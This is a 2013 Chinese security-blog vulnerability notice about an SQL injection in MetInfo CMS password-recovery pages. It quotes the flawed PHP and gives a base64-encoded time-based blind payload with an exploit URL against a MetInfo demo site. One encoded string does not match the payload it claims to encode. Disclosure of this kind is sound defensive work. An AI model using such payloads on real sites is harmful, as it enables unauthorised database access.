您的位置 » 首页 » 代码审计,实用工具 » 漏洞播报:metinfo(米拓)企业网站管理系统SQL注入漏洞

漏洞播报:metinfo(米拓)企业网站管理系统SQL注入漏洞

发表于4年前 | 作者: seay | 分类: 代码审计, 实用工具 | 孵化于:2013年06月30日 | 文章热度:4,881 次 全屏阅读

显示不全请点击全屏阅读

漏洞发生在member/getpassword.php与admin/admin/getpassword.php文件中
if($p){
    $array = explode('.',base64_decode($p));
    $sql="SELECT * FROM $met_admin_table WHERE admin_id='".$array[0]."'";
    $sqlarray = $db->get_one($sql);
base64_decode($p)后的值用explode分割然后提交给 $array数组,最终$array[0]进入SQL查询,注入发生。
漏洞证明:
1’or(select sleep(5))#.1将之base64编码MSdvcihzZWxlY3Qgc2xlZXAoMTApKSMuMQ==
然后EXP
http://demo.metinfo.cn/member/getpassword.php?lang=cn&p=MSdvcihzZWxlY3Qgc2xlZXAoNSkpIy4x
修复方案:
过滤$array[0]

 

作者:applychen

 

Tags:

Metinfo漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3122/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有1个筒子留下了脚印...

  • qq1433 说:
    1楼
    2013 年 7 月 2 日 上午 8:56 回复

    执行后 怎么提示 输入用户名? 好像是找回密码

    成功后 显示什么? 😯

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)